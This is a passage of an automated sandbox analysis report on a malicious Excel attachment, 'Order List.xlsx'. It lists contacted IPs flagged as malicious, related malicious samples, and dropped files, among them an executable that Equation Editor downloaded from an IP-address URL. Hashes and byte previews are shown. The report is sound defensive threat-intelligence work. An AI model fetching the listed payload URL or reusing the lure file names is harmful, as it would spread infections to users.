http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000002.2347379246.0000000000260000.00000004.00000020.sdmp | false | - | high
http://sads.myspace.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://busca.buscape.com.br/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.pchome.com.tw/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://browse.guardian.co.uk/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://google.pchome.com.tw/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://list.taobao.com/browse/search_visual.htm?n=15&amp;q= | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.rambler.ru/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://uk.search.yahoo.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://espanol.search.yahoo.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.ozu.es/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://search.sify.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://openimage.interpark.com/interpark.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.yahoo.co.jp/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://search.ebay.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.gmarket.co.kr/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://search.nifty.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://searchresults.news.com.au/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (2x)
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://www.google.si/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.google.cz/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.soso.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.univision.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://search.ebay.it/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://busca.orange.es/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2159393395.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.target.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://buscador.terra.es/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.iask.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.tesco.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.interpark.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://investor.msn.com/explorer.exe, 00000006.00000000.2144980691.0000000003C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://search.espn.go.com/explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown

                                                                                                                                                                Contacted IPs


                                                                                                                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
137.59.52.234 | unknown | India | 133694 | EMAXGLOBAL-ASEMAXGLOBALMEDIAPVTLTDIN | true
67.227.214.78 | unknown | United States | 32244 | LIQUIDWEBUS | true
198.23.212.188 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
104.24.122.89 | unknown | United States | 13335 | CLOUDFLARENETUS | true
185.119.173.57 | unknown | United Kingdom | 198047 | UKWEB-EQXGB | true
198.54.117.216 | unknown | United States | 22612 | NAMECHEAP-NETUS | false

Private

IP
192.168.2.255

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 321137
Start date: 20.11.2020
Start time: 12:04:08
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 23s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Order List.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@9/6@10/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 42.2% (good quality ratio 40%)
• Quality average: 75.5%
• Quality standard deviation: 28.6%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• TCP Packets have been reduced to 100
• Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

Time | Type | Description
12:04:59 | API Interceptor | 60x Sleep call for process: EQNEDT32.EXE modified
12:05:01 | API Interceptor | 28x Sleep call for process: vbc.exe modified
12:05:04 | API Interceptor | 34x Sleep call for process: RegAsm.exe modified
12:05:20 | API Interceptor | 219x Sleep call for process: rundll32.exe modified
12:05:45 | API Interceptor | 1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                                148wWoi8vI.exeGet hashmaliciousBrowse
                                                                                                                                                                • 98.129.229.113
                                                                                                                                                                New Additional Agreement - Commercial and Technical Proposal for Supply.exeGet hashmaliciousBrowse
                                                                                                                                                                • 209.59.139.176
                                                                                                                                                                mFNIsJZPe2.exeGet hashmaliciousBrowse
                                                                                                                                                                • 209.59.139.176
                                                                                                                                                                http://safetyservices.mmdotsafety.comGet hashmaliciousBrowse
                                                                                                                                                                • 67.227.152.62
                                                                                                                                                                http://www.115115bd.pepperheads-hotsauces.com/YXVyZWxpby5jYWJhbGxlcm9AZXZvbHV0aW8uY29t#aHR0cHM6Ly9wd2Fuc2lnbmF0dXJlcy5jb20vZHNzdm4vSUsvb2YxPzk4MDA3NjU0NDMyJmRhdGE9YXVyZWxpby5jYWJhbGxlcm9AZXZvbHV0aW8uY29tGet hashmaliciousBrowse
                                                                                                                                                                • 67.227.186.136
                                                                                                                                                                http://www.847847.pepperheads-hotsauces.com#aHR0cHM6Ly9nY3VlaXQuY29tL2pyL0lLL29mMS9wbXNvYXJlc0BnbmJnYS5wdA==Get hashmaliciousBrowse
                                                                                                                                                                • 67.227.186.136
                                                                                                                                                                GOOGLEUSBANK ACCOUNT INFO!.exeGet hashmaliciousBrowse
                                                                                                                                                                • 35.230.2.159
                                                                                                                                                                http://global.krx.co.kr/board/GLB0205020100/bbs#view=649Get hashmaliciousBrowse
                                                                                                                                                                • 108.177.15.155
                                                                                                                                                                Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                                                                                                                • 34.102.136.180
                                                                                                                                                                invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                • 34.102.136.180
                                                                                                                                                                TR-D45.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                • 34.102.136.180
                                                                                                                                                                knitted yarn documents.exeGet hashmaliciousBrowse
                                                                                                                                                                • 172.253.120.109
                                                                                                                                                                86dXpRWnFG.exeGet hashmaliciousBrowse
                                                                                                                                                                • 34.102.136.180
                                                                                                                                                                https://kimiyasanattools.com/outlook/latest-onedrive/microsoft.phpGet hashmaliciousBrowse
                                                                                                                                                                • 172.217.16.130
                                                                                                                                                                b0408bca49c87f9e54bce76565bc6518.exeGet hashmaliciousBrowse
                                                                                                                                                                • 74.125.34.46
                                                                                                                                                                b2e3bd67d738988ca1bbed8d8b3e73fc.exeGet hashmaliciousBrowse
                                                                                                                                                                • 74.125.34.46
                                                                                                                                                                ad14f913dc65be569277c8c76de608a4.exeGet hashmaliciousBrowse
                                                                                                                                                                • 74.125.34.46
                                                                                                                                                                b2352353279664cc442f346015e86317.exeGet hashmaliciousBrowse
                                                                                                                                                                • 74.125.34.46
                                                                                                                                                                ab1671011f681ff09ac0ffd70fc4b92b.exeGet hashmaliciousBrowse
                                                                                                                                                                • 74.125.34.46
                                                                                                                                                                BetterPoints_v4.60.1_apkpure.com.apkGet hashmaliciousBrowse
                                                                                                                                                                • 216.58.212.163
                                                                                                                                                                b0e7416dbf03a7359e909c5bd68ae6e1.exeGet hashmaliciousBrowse
                                                                                                                                                                • 74.125.34.46
                                                                                                                                                                afaa3d5f10a2ea3c2813b3dd1dac8388.exeGet hashmaliciousBrowse
                                                                                                                                                                • 74.125.34.46
                                                                                                                                                                afbce292dbb11bda3b89b5ff8270bd20.exeGet hashmaliciousBrowse
                                                                                                                                                                • 74.125.34.46
                                                                                                                                                                aea80fb9d13561d7628b9d2f80a36ad0.exeGet hashmaliciousBrowse
                                                                                                                                                                • 74.125.34.46
                                                                                                                                                                af8eb3450867384ca855f2f0d0d6ae94.exeGet hashmaliciousBrowse
                                                                                                                                                                • 74.125.34.46
                                                                                                                                                                ae80b9b86323a612ce7a9c99f5cb65b4.exeGet hashmaliciousBrowse
                                                                                                                                                                • 74.125.34.46
                                                                                                                                                                CLOUDFLARENETUSUSD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEGet hashmaliciousBrowse
                                                                                                                                                                • 162.159.133.233
                                                                                                                                                                Request for quotation.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 172.67.181.41
                                                                                                                                                                MV TBN.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.28.5.151
                                                                                                                                                                PO 20-11-2020.ppsGet hashmaliciousBrowse
                                                                                                                                                                • 172.67.22.135
                                                                                                                                                                Quotation ATB-PR28500KINH.exeGet hashmaliciousBrowse
                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                23prRlqeGr.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.23.98.190
                                                                                                                                                                RFQ-HSO-76411758-1.jarGet hashmaliciousBrowse
                                                                                                                                                                • 104.20.23.46
                                                                                                                                                                RFQ-HSO-76411758-1.jarGet hashmaliciousBrowse
                                                                                                                                                                • 104.20.22.46
                                                                                                                                                                iG9YiwEMru.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.27.132.115
                                                                                                                                                                Avion Quotation Request.docGet hashmaliciousBrowse
                                                                                                                                                                • 104.22.54.159
                                                                                                                                                                SUSPENSION LETTER ON SIM SWAP.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                • 172.67.131.55
                                                                                                                                                                Quotation ATB-PR28500KINH.exeGet hashmaliciousBrowse
                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                SaXJC2CZ8m.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.27.133.115
                                                                                                                                                                PO91666. pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                • 172.67.143.180
                                                                                                                                                                BT2wDapfoI.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.23.98.190
                                                                                                                                                                ara.exeGet hashmaliciousBrowse
                                                                                                                                                                • 172.65.200.133
                                                                                                                                                                ORDER FORM DENK.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.18.47.150
                                                                                                                                                                araiki.exeGet hashmaliciousBrowse
                                                                                                                                                                • 172.65.200.133
                                                                                                                                                                arailk.exeGet hashmaliciousBrowse
                                                                                                                                                                • 172.65.200.133
                                                                                                                                                                https://filmconsultancy.bindwall.ml/mike@filmconsultancy.comGet hashmaliciousBrowse
                                                                                                                                                                • 104.26.4.196
                                                                                                                                                                EMAXGLOBAL-ASEMAXGLOBALMEDIAPVTLTDINhttps://capricornbiotech.com/coroGet hashmaliciousBrowse
                                                                                                                                                                • 103.39.133.148
                                                                                                                                                                AS-COLOCROSSINGUSPO1.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 192.3.141.160
                                                                                                                                                                document.docGet hashmaliciousBrowse
                                                                                                                                                                • 192.210.214.139
                                                                                                                                                                Financial draft.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 192.210.214.146
                                                                                                                                                                RFQ_SMKM19112020.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 198.23.212.152
                                                                                                                                                                Payment_Confirmation_Slip.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 198.23.212.152
                                                                                                                                                                Order List.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 198.23.213.57
                                                                                                                                                                PI_SMK18112020.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 198.23.212.152
                                                                                                                                                                y5y4LzZPCE.exeGet hashmaliciousBrowse
                                                                                                                                                                • 192.210.214.146
                                                                                                                                                                8pSlNVws0a.exeGet hashmaliciousBrowse
                                                                                                                                                                • 192.210.214.146
                                                                                                                                                                PaymentNOV+2020.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 192.210.214.146
                                                                                                                                                                https://techmusicdocs.ml/cgi/wnw/f14bd18100fd55fbd62a16f226e272e2/L001L001.htmGet hashmaliciousBrowse
                                                                                                                                                                • 198.23.213.236
                                                                                                                                                                Finance Draft COO.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 192.210.214.146
                                                                                                                                                                https://techmusicdocs.ml/cgi/wnw/f14bd18100fd55fbd62a16f226e272e2/L001L001.htmGet hashmaliciousBrowse
                                                                                                                                                                • 198.23.213.236
                                                                                                                                                                https://techmusicdocs.ml/cgi/wnw/f14bd18100fd55fbd62a16f226e272e2/L001L001.htmGet hashmaliciousBrowse
                                                                                                                                                                • 198.23.213.236
                                                                                                                                                                https://techmusicdocs.ml/cgi/wnw/f14bd18100fd55fbd62a16f226e272e2/L001L001.htmGet hashmaliciousBrowse
                                                                                                                                                                • 198.23.213.236
                                                                                                                                                                ShippingDoc.jarGet hashmaliciousBrowse
                                                                                                                                                                • 198.46.141.66
                                                                                                                                                                baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                                                                                                                • 198.46.134.245
                                                                                                                                                                https://bremen.com.ve/TDS/ofc1Get hashmaliciousBrowse
                                                                                                                                                                • 192.210.150.19
                                                                                                                                                                Order List.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 75.127.1.225
                                                                                                                                                                PO-4806125050.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 198.23.213.57

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 552960
Entropy (8bit): 7.8534634080579835
Encrypted: false
SSDEEP: 12288:iYHsi433VV/WKmD8UT9Qw4RB07JglwNtAyYtoUqqwyniC:7Hs73NmD/6w4yOwrC9qgi
MD5: BF75ED61E1B1F7B310EC1D999077C4DD
SHA1: CDCED77E176E38FF459CDEA08941DE26861647CD
SHA-256: 69357684EC8F83D428D2030DB5F3D586718207E86457465E7FD37B3B4B7C4DB2
SHA-512: D2FA7F6E1E41BEBEDBDBA492A163B8388F2326B92D939E9352C32F5BE5A311BB75E4374524B2B314B5A426763113935E00F4C81AACC26ED08E9C9DD356DD7510
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 27%
Reputation: low
IE Cache URL: http://198.23.212.188/reg/vbc.exe
                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Wt._.................h............... ........@.. ..............................p.....@.................................@...K.......B............................................................................ ............... ..H............text....f... ...h.................. ..`.rsrc...B............j..............@..@.reloc...............n..............@..B................p.......H.......p...............q...t..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r%..p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\636483E5.jpeg
                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):48770
                                                                                                                                                                Entropy (8bit):7.801842363879827
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\64EDB67F.emf
                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1099960
                                                                                                                                                                Entropy (8bit):2.015332475750147
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:mXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:0ahIFdyiaT2qtXw
                                                                                                                                                                MD5:11675D165672DE2B95C0C5327187854F
                                                                                                                                                                SHA1:0B963BFA3BDF93A23CED4E134D1ABF7970ED974A
                                                                                                                                                                SHA-256:E1D6328C979E9EEA70E1EB2721EB636C8989629FB72F5CF314FED2AD3C28ADAD
                                                                                                                                                                SHA-512:C47F29969934497630C664E3192E42DF859DADF21D5AB228F835FAE3CAEABF513F9264BD10A538198398A64B28E3AEABACFD3922802F67FE2A9D7CA9DFCC25F7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................0...0.....$.0...0..N.X$.0...0.......0...0..N.X$.0...0. ....y.R..0.$.0. ............z.R............o...............................X...%...7...................{ .@................C.a.l.i.b.r...............0.X.....0.P.0..2.R..........0...0..{.R......0.....dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A92FDE74.jpeg
                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):48770
                                                                                                                                                                Entropy (8bit):7.801842363879827
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                C:\Users\user\Desktop\~$Order List.xlsx
                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):330
                                                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                Malicious:true
                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                C:\Users\Public\vbc.exe
                                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):552960
                                                                                                                                                                Entropy (8bit):7.8534634080579835
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:iYHsi433VV/WKmD8UT9Qw4RB07JglwNtAyYtoUqqwyniC:7Hs73NmD/6w4yOwrC9qgi
                                                                                                                                                                MD5:BF75ED61E1B1F7B310EC1D999077C4DD
                                                                                                                                                                SHA1:CDCED77E176E38FF459CDEA08941DE26861647CD
                                                                                                                                                                SHA-256:69357684EC8F83D428D2030DB5F3D586718207E86457465E7FD37B3B4B7C4DB2
